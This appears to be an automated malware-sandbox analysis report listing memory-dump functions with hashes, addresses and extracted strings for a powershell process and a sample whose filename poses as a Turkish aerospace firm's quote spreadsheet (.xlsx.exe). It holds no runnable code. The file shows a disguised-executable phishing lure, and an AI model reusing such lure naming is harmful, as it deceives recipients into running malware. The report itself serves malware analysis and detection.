Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fee3ee06c4f9faf106c511239f8e47c7950606e61d1ba5a2f0515a3727f5f569
Instruction ID: 8d504a996497aca8e17c5f07f2af19edd49f3513fcd64c4eeb6933c53e3c0115
Opcode Fuzzy Hash: fee3ee06c4f9faf106c511239f8e47c7950606e61d1ba5a2f0515a3727f5f569
Instruction Fuzzy Hash: DDF06D709013049FD7609BB9D89D79B7BE5FB44320F004429E55EC3340DB396980CB90

Function 008CF860 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da453f9dccac897bb106e6c1ac827bb55c52d0e86ad64d5700a6e219f2e42664
Instruction ID: be2c75c624fd36b3af67650451831fa6315df82600b5561d149fdaad8bcb53dc
Opcode Fuzzy Hash: da453f9dccac897bb106e6c1ac827bb55c52d0e86ad64d5700a6e219f2e42664
Instruction Fuzzy Hash: CDE012B5D102499F8B40EFB8D842699FFF4EB49201F5085AEC948D7201EB315A12DBD1

Function 008C8978 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0efa3f38a665c319d300c947f785e4e4bee7ad5799459f64dfa5804d264e2e33
Instruction ID: 242185ddc8d8a3b0f0fe0eea54e5a717fda3938ca336338eb8ebba23af67c1b6
Opcode Fuzzy Hash: 0efa3f38a665c319d300c947f785e4e4bee7ad5799459f64dfa5804d264e2e33
Instruction Fuzzy Hash: 0BE02631705210A7CB09377AA80D2AE7A56FBC4735F00002AEA06C3341CF7C6D0183EA

Function 008C9558 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a404041c49751b731aa37e54a9aebf56882e245f97a4be3c16cc4bf925a0241
Instruction ID: 44cc75f21d59c48a4d53151e6439b19c7bc3238cfc10601a848aea783b2257b0
Opcode Fuzzy Hash: 2a404041c49751b731aa37e54a9aebf56882e245f97a4be3c16cc4bf925a0241
Instruction Fuzzy Hash: F5D05E927811291B4A9530AE1801FBB91EFDBC56A0705017EFA15D3742ED71CC0113F2

Function 008CDCF0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: 35ed3c03118b7cb07297cf3af62d1211ddc09c46e35559f65a950267a980355b
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 93E08632B00118978B089599D4509E9F7B5EBCC324F14847ED90AE7340DA32A91686E1

Function 008CC590 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c93815dcfcfb500ac34efa2e6c6196c236b20f2a9ae7d332e2bee5316ca4fe5e
Instruction ID: de9f19b2deafbb95b9fb58f5066ecc8bc7d8fca8584dd93bf770fe0541a92e4e
Opcode Fuzzy Hash: c93815dcfcfb500ac34efa2e6c6196c236b20f2a9ae7d332e2bee5316ca4fe5e
Instruction Fuzzy Hash: DBE08631304251EFC305576DA815419BBE9FFC966130800BBE509C33C1DE19EC148795

Function 008C8739 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9926694cacecb26d87118184a7079e9affb1cc2452e4c28100f732fc2dbc1d39
Instruction ID: 60cd56c591f80be0a0c6be7863be20abd5b41e6e41bd7b9fdf2bfbdefa6b6f9b
Opcode Fuzzy Hash: 9926694cacecb26d87118184a7079e9affb1cc2452e4c28100f732fc2dbc1d39
Instruction Fuzzy Hash: FEE04F3080920ADFCB09AFA6E81A8EDBF30FF44311B5041A9D94292680EF306A56CF81

Function 008C8800 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04b93566ff3e75e51537bb972a67bae339b0532248699bcdb1cfee5c89d1d695
Instruction ID: d7f42f7c37b39934b783196a8ccb0919591f0a0e8840109cdf914fc8971419e0
Opcode Fuzzy Hash: 04b93566ff3e75e51537bb972a67bae339b0532248699bcdb1cfee5c89d1d695
Instruction Fuzzy Hash: CAE04F38A4920EDFC754DF65E4975AABFB0FB45304B108159DD1593384EB306955CBC1

Function 008CC5A0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85b0249f8029854062f43e18f3396c8b33cf99994680f5a72800bc412e1b1ce1
Instruction ID: 1dbc76fb4f6afb13a68847c6f10bdf98a0c78d35395976d9d289620022ba194a
Opcode Fuzzy Hash: 85b0249f8029854062f43e18f3396c8b33cf99994680f5a72800bc412e1b1ce1
Instruction Fuzzy Hash: C9D09E75301514BB8204666DA41A959B7DDF6C9AB2308007AE60AC37C0DE65DC058795

Function 008CF870 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: c572508f8c69d2ba54007da0c5f3c52b5f2ee93db0de8e424c6223e5fcf99e11
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: DED042B4D042099F8780EFA9894166EFBF4EB48204F6085BA8919E7241E6329A129BD1

Function 008C8748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3de82d6575359449124f5b0072fc2d7d5b42332b660405f2acf8bff60dc23233
Instruction ID: 6f5bb9175b7761dda8bad8d61fa3390257a6494a986835d001ede70e20d89f7a
Opcode Fuzzy Hash: 3de82d6575359449124f5b0072fc2d7d5b42332b660405f2acf8bff60dc23233
Instruction Fuzzy Hash: 26D0173080610DDBCB08ABA5E81B8FDBB34FB40311F400169D90792690EF342A4ACBC1

Function 008C8810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46bd3621dfe2a768d2dfc5e82519ac350dc7c7e826e29c3033911c096b7b75f1
Instruction ID: 18d288100eeb065c5db96543183e683761c9c5666316eb62f6960c350d5df535
Opcode Fuzzy Hash: 46bd3621dfe2a768d2dfc5e82519ac350dc7c7e826e29c3033911c096b7b75f1
Instruction Fuzzy Hash: 9BD01734A0920EABCB08EFA5E84686EBFB4FB85304F004169DD09D3380EA346801CBC1

Function 008CEA57 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b6ae925bcde78cc480c3a70f042cf1c60c456dd16c561fab78990b1f35073a
Instruction ID: c5fb9a49415e91f5d7f8945f5d839173b35b0f14662c11d0e21b568f0fd9f2f8
Opcode Fuzzy Hash: 94b6ae925bcde78cc480c3a70f042cf1c60c456dd16c561fab78990b1f35073a
Instruction Fuzzy Hash: A9D0923AA41218DFCB04CB94E895A9CF371FB84325F2080A6E519A7350CB32ED12CB40

Function 008C7932 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c392eca13dd766fa8ee9809e022c613ae57c9b43bf52e9e658db033446726141
Instruction ID: c176773e629167e04ce81e88bac88da132246fcb1ff004f48343c97c5e4ac7fb
Opcode Fuzzy Hash: c392eca13dd766fa8ee9809e022c613ae57c9b43bf52e9e658db033446726141
Instruction Fuzzy Hash: F4D0807444D3C89FCB254F74D4D89083F94AF02311F0008DCD8864A1A3C977C084CF00

Function 008C7EA0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b691595abb733bcfe79f737f63c601fe9f13091dc47f13b85d66195c608360cf
Instruction ID: 8502c083d9a4b8ba202bec7ed0b088b77e7788bfd4442bd527654bd3e0f2a125
Opcode Fuzzy Hash: b691595abb733bcfe79f737f63c601fe9f13091dc47f13b85d66195c608360cf
Instruction Fuzzy Hash: D9C04C665692404FEF09C731C8657167A326B56201B0685AD9082D6895C965400ADA01

Function 008C7940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef1c96051f35bb444c218eee26dcbc92c17f79f39296bd5cd6c21112935dd605
Instruction ID: 4f140c055dc0a7e383054ed977f6e6b45b709975de12d36963d6e7739f505e58
Opcode Fuzzy Hash: ef1c96051f35bb444c218eee26dcbc92c17f79f39296bd5cd6c21112935dd605
Instruction Fuzzy Hash: 70B0923018974C8FC2586F75A858818736DAB4021538004ACE80E0A2A28E76E8C4CA54

Non-executed Functions

Function 06F01BE0 Relevance: 14.1, Strings: 11, Instructions: 395COMMON

Download Yara Rule

Strings

$cPk, xrefs: 06F020B4
J^l, xrefs: 06F02017
J^l, xrefs: 06F020C2
84[l, xrefs: 06F01F6C
J^l, xrefs: 06F0200B
r]l, xrefs: 06F01C53
r]l, xrefs: 06F01C5D
J^l, xrefs: 06F01FA1
84[l, xrefs: 06F01F76
J^l, xrefs: 06F020CE
pi%k, xrefs: 06F01C73

Memory Dump Source

Source File: 00000003.00000002.2204091271.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f00000_powershell.jbxd

Similarity

API ID:
String ID: $cPk$84[l$84[l$pi%k$J^l$J^l$J^l$J^l$J^l$r]l$r]l
API String ID: 0-867203518
Opcode ID: 97fe5ef3398f3a6346f1159e3d4cc7ad310f4f02b3793c5df02ced8a8b8cf21f
Instruction ID: df91996d9802c32cb4dafd8638f3d59c951c5eff3161a17261af2359fb1ee848
Opcode Fuzzy Hash: 97fe5ef3398f3a6346f1159e3d4cc7ad310f4f02b3793c5df02ced8a8b8cf21f
Instruction Fuzzy Hash: D8D12532F04315CFEB61CBA888146AAFBE6AFC5311F14C0BBD5058B296DB31C945D7A2

Function 06F022E9 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

pi%k, xrefs: 06F023A0
J^l, xrefs: 06F023C5
pi%k, xrefs: 06F02363
J^l, xrefs: 06F0237F

Memory Dump Source

Source File: 00000003.00000002.2204091271.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f00000_powershell.jbxd

Similarity

API ID:
String ID: pi%k$pi%k$J^l$J^l
API String ID: 0-3187117269
Opcode ID: a085d6959b06418983dbf1428e90c699758f95d39af2f41fc18798728263fb30
Instruction ID: 47f467d74705894030c7883cd3bd92a86c5508febc7bf765c5c28d01925ec62f
Opcode Fuzzy Hash: a085d6959b06418983dbf1428e90c699758f95d39af2f41fc18798728263fb30
Instruction Fuzzy Hash: 7831C536D04305DFFFA18F15C54A6A97BF4AB09250F4880A7D8548B1D2D334DB85EBB1

Function 008C200D Relevance: 5.0, Strings: 4, Instructions: 29COMMON

Download Yara Rule

Strings

q, xrefs: 008C2012
q, xrefs: 008C2032
q, xrefs: 008C2022
q, xrefs: 008C2042

Memory Dump Source

Source File: 00000003.00000002.2190093134.00000000008C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8c0000_powershell.jbxd

Similarity

API ID:
String ID: q$q$q$q
API String ID: 0-594874556
Opcode ID: 4fe892982acd6ddfbf1c4ed9b5181643658a6d89afda7c597301079463b8cc40
Instruction ID: ceed3c87cfb92171ee8469e17f2b6e97ebaa745fa20f2e2016e794f6887afe91
Opcode Fuzzy Hash: 4fe892982acd6ddfbf1c4ed9b5181643658a6d89afda7c597301079463b8cc40
Instruction Fuzzy Hash: C9F0DA65D0E2C6AFE3235739582A2A43F705F27204F5900EA8CA4CB4D7F59D582AC356

Analysis Process: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exePID: 5728, Parent PID: 2248COMMON

Executed Functions

Function 02E26FC8 Relevance: .5, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc178a4c64f3f222743afa0007d3657c01d0c626a195116aaa16beaf8b814c22
Instruction ID: 3cfcf0252079245c19c9ff697acf90fa846ba55d5c0e2517b8684942986aa2e7
Opcode Fuzzy Hash: fc178a4c64f3f222743afa0007d3657c01d0c626a195116aaa16beaf8b814c22
Instruction Fuzzy Hash: 19125070A80129DFCB15CF69C884AAEFBF6BF88308F55D069E846A7261D734DC49CB50

Function 02E269A9 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5519eabba57ef6132355abeeda2785c2c3c45c0933fe089a1abdea3d82901547
Instruction ID: b1033ec0996ac358d8d9181a07c3b5d97ab0ab98daf435d22a7688cee4455ea9
Opcode Fuzzy Hash: 5519eabba57ef6132355abeeda2785c2c3c45c0933fe089a1abdea3d82901547
Instruction Fuzzy Hash: 7D026E70A402198FDB14DF69C854BAEBBB6FF88704F208569E446EB395DF309D45CB90

Function 02E23E09 Relevance: .4, Instructions: 415COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30241f1187fedbd2ff924d2c60cc4852eca5137c5ea4fb3e5240a6a392d71e38
Instruction ID: 79208a0e3a916e4ceb1a581c46aaaa87d71fff81f6b2806a0a8726a6093f02af
Opcode Fuzzy Hash: 30241f1187fedbd2ff924d2c60cc4852eca5137c5ea4fb3e5240a6a392d71e38
Instruction Fuzzy Hash: E1E18974E40229CFDB08DFB5D4849AEBBB6BFC8700B10D569E506AB394DB349846CB91

Function 0554E6B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3397745281.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5540000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47e3f108546bf692d8c67814d48bcd2be20e21d86df75b1edfb1f92b22a510b1
Instruction ID: e073764547409383614a464142afbb1cc7c9718c028b9a981fa72d8c3b53c28d
Opcode Fuzzy Hash: 47e3f108546bf692d8c67814d48bcd2be20e21d86df75b1edfb1f92b22a510b1
Instruction Fuzzy Hash: 61C1AE74E01218CFDB14DFA5C984B9DBBB2BF88304F2081A9D809AB355DB359E85CF51

Function 02E2C146 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a9dcb711ae84dcd5f331e7e799b1970ccd0365ceed8cd3f8df92fa586bf2d84
Instruction ID: a7f496d63b2eaed76e3e49dca3f51e655db18448f8dfac72bbcf576527b5ac03
Opcode Fuzzy Hash: 0a9dcb711ae84dcd5f331e7e799b1970ccd0365ceed8cd3f8df92fa586bf2d84
Instruction Fuzzy Hash: 0BA11A74E40228CFDB14DFA9C884A9DBBF2BF49314F25D1AAE409AB365DB709845CF50

Function 02E2CA11 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c37c1a017d1a1c237c1133f01c2778ecd405f84ab3546bab1f8eb07b22cb774
Instruction ID: f04a34fc14690137088658bd521873afd0dd5b857051964cc189d6b82a91e866
Opcode Fuzzy Hash: 2c37c1a017d1a1c237c1133f01c2778ecd405f84ab3546bab1f8eb07b22cb774
Instruction Fuzzy Hash: AA81E774E00218CFDB14DFA9D894A9DBBF2BF88304F25E06AE409AB365DB749945CF50

Function 02E2C738 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e752e44f69001f73b135fdccb4afaab962e63856b0567a6fc737c60124b6476
Instruction ID: 5f3c6c74366ac8910d09f88781b28204b58055ac03a8301ce1aa34b4e6d233fe
Opcode Fuzzy Hash: 1e752e44f69001f73b135fdccb4afaab962e63856b0567a6fc737c60124b6476
Instruction Fuzzy Hash: 8681C374E00218CFDB18DFAAD984B9DBBF2BF88304F25D06AD409AB265DB749945CF50

Function 02E2CFA9 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6781b439314d9d3ce6016a63bf508c2fc7773d100f892ebf985c4cc14a33e41
Instruction ID: 1a579a3c41be484c03cf7b9fba955e8490cfbe9594a1a76518697ab46d6e7f5f
Opcode Fuzzy Hash: e6781b439314d9d3ce6016a63bf508c2fc7773d100f892ebf985c4cc14a33e41
Instruction Fuzzy Hash: 3F81C674E00228CFDB14DFAAD884A9DBBF2BF88314F14D069E509AB365DB749985CF10

Function 02E2D281 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4717278c60e49807d7049cf6b7af6e0e16ae33f5a97dd9129f783a3851061d05
Instruction ID: c9b2b7961f495f37f1f6ae33af483476fcd0e774a98faf128eca82a3e5a411a5
Opcode Fuzzy Hash: 4717278c60e49807d7049cf6b7af6e0e16ae33f5a97dd9129f783a3851061d05
Instruction Fuzzy Hash: 6B81C374E00218CFEB18DFAAD984A9DBBF2BF88304F14D069E509AB365DB349945CF10

Function 02E2C475 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a3da5e28f7e5aceb659b630025e08160303864e08b1f64f53b90af2d4af0e1
Instruction ID: b0549b43c8452b6effcea3d70de4a3f5df727ec88444c1505fe2ada92430704d
Opcode Fuzzy Hash: 85a3da5e28f7e5aceb659b630025e08160303864e08b1f64f53b90af2d4af0e1
Instruction Fuzzy Hash: D281D574E40218CFDB14DFA9D844A9DBBF2BF88304F25E06AE419AB365DB349945CF50

Function 02E2CCE1 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7842c1219365b48bf251e404691fa3cc699896db6541530adfe7a4b861003ea1
Instruction ID: 1b713c7071dc712bc57167c001c8def718540b5936d12c21533f8d965afacce6
Opcode Fuzzy Hash: 7842c1219365b48bf251e404691fa3cc699896db6541530adfe7a4b861003ea1
Instruction Fuzzy Hash: BB81C774E40218CFDB14DFA9D844AADBBF2BF88304F25D06AD409AB365DB749945CF50

Function 02E25371 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eb3b5ea9976b599a8094e69b3e6cf93a38e6c3068cc8120d2fd69894a63bb8c
Instruction ID: 3adc6c7da6660d24076d20eaa4a3c1b6be42ee193486d991e2720d3ce114861b
Opcode Fuzzy Hash: 7eb3b5ea9976b599a8094e69b3e6cf93a38e6c3068cc8120d2fd69894a63bb8c
Instruction Fuzzy Hash: 0361D274E40258CFDB18DFAAD984A9DBBF2BF88300F14D169E819AB365DB349845CF50

Function 02E2E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b133f4b3e8f9b09e87840cca308dd039d836a08dc50b53e9895511e3c4d9d75
Instruction ID: 1c0af78229fe631062ab04cb70c8e25b195e0fa06d20cbebcb75aafe169d7997
Opcode Fuzzy Hash: 3b133f4b3e8f9b09e87840cca308dd039d836a08dc50b53e9895511e3c4d9d75
Instruction Fuzzy Hash: 6D519374E01218DFEB18DFAAD494A9DBBB2FF88300F24D029E819AB365DB745945CF14

Function 02E2E981 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f2145d4b526b54db85befb7301438be1b8ef837bf2b91562d7f913aa1888da2
Instruction ID: 2e9f7aa0ea7e9cdeb7abe16a949141f3f4621a2fe5fcc112970f2495b1229ec9
Opcode Fuzzy Hash: 4f2145d4b526b54db85befb7301438be1b8ef837bf2b91562d7f913aa1888da2
Instruction Fuzzy Hash: 89519374E01218DFEB18DFAAD494A9DBBB2FF88300F24D029E815AB365DB755845CF14

Function 0554E6AF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3397745281.0000000005540000.00000040.00000800.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_5540000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb4d35820fb3027451fa58141cffd325ad4431c792c4fa5fbd3ce11cca4d486
Instruction ID: 39fa00a7ee4c339eb51aaf70156ca87a39f56f7b2f7abfb8117e0d161d88eca0
Opcode Fuzzy Hash: 4bb4d35820fb3027451fa58141cffd325ad4431c792c4fa5fbd3ce11cca4d486
Instruction Fuzzy Hash: 1141D170E012488BEB18DFAAD5456EEFBF2BF89304F24D12AC419BB254EB355946CF50

Function 02E2E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.3383236440.0000000002E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e20000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27bbb8b6bf951d37d03c0b45c54785ca18bb36145d5a81c7547c70d8ea82e817
